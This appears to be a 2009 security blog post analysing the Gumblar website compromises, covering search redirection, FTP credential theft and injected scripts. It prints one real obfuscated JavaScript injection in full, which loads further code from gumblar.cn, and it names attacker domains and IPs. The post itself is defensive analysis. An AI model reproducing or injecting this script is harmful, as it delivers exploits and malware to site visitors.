Throughout the first quarter of 2009, ScanSafe STAT has been monitoring an exponentially growing number of website compromises that deliver malware from 94.247.2.195. The malware resulting from the attacks forcibly redirects Google search page results to links other than the user expected. As we reported in "Malware Manipulating Google SERPs", that malware also includes a component to steal FTP usernames and passwords. As more and more folks get infected as a result of visits to the compromised sites or via the forcible search redirections, the attackers are able to collect even more FTP credentials and compromise ever increasing numbers of sites, thus gaining even greater numbers of victims.

Beginning in early May, a new twist occurred in these redirection attacks. When owners of the victim sites attempt to remove the malicious scripts related to the 94.247.2.195 compromise, a new malicious script is injected that pulls exploits and malware from gumblar.cn.

The injected scripts used in the gumblar.cn attacks appear to be dynamically obfuscated and thus may vary from site to site and even among pages on the same site. Following is one example of the injected script:

(function(){var.
kVA9=('var>20>61>3d>22>53crip>74En>67>69ne>22>2cb>3d>22Ver>73io>6e>28)+>22>2
c>6a>3d>22>22>2cu>3d>6eavi>67ator>2euse>72>41g>65n>74>3bif>28(u>2ein>64ex>4f
f(>22>57i>6e>22)>3e0)>26>26(>75>2e>69>6ede>78>4f>66(>22N>54>20>36>22)>3c>30)
>26>26(doc>75ment>2ecoo>6bie>2ei>6ede>78Of>28>22mie>6b>3d1>22)>3c0)>26>26(t>
79p>65of(z>72v>7at>73)>21>3dtypeof(>22A>22)))>7b>7arvzts>3d>22A>22>3beval(>2
2>69>66(wi>6edo>77>2e>22+a+>22>29j>3dj+>22+a+>22Major>22>2b>62+a+>22Mino>72>
22>2b>62+a+>22Bui>6cd>22>2bb+>22j>3b>22>29>3bd>6f>63ument>2ewr>69>74>65(>22>
3c>73cript>20>73>72>63>3d>2f>2fgu>6d>62>6car>2ecn>2frss>2f>3fid>3d>22+j+>22>
3e>3c>5c>2f>73crip>74>3e>22)>3b>7d').replace(/>/g,'%');var
xpMR=unescape(kVA9);eval(xpMR)})();

The first portion of the script looks for a particular cookie and then tries to determine what scripting engine is being used. Based on those results, the script will then write out either a working or a non-working source reference. The attackers appear to be targeting Internet Explorer users by this process. The reason for the targeting is unclear because the exploits used to deliver the malware involve Adobe PDF and Adobe Flash (SWF) vulnerabilities which aren't browser dependent.

The gumblar.cn compromise may also be accompanied by malicious iframes that load exploits and malware from domains hosted at 213.182.197.23, including liteautotop.cn, bigtruckstopseek.cn, autobestwestern.cn and several others. Both the 94.247.2.195 and 213.182.197.23 addresses are hosted in Latvia whereas the gumblar.cn domain has a Moscow IP that reverses to ukservers.com.  Coincidentally, the malware loaded in the most recent round of attacks results in the installation of a backdoor that attempts to communicate with a botnet command & control located at 78.109.29.112 -  a bot c&c with past ties to malware engaged in forcible redirects.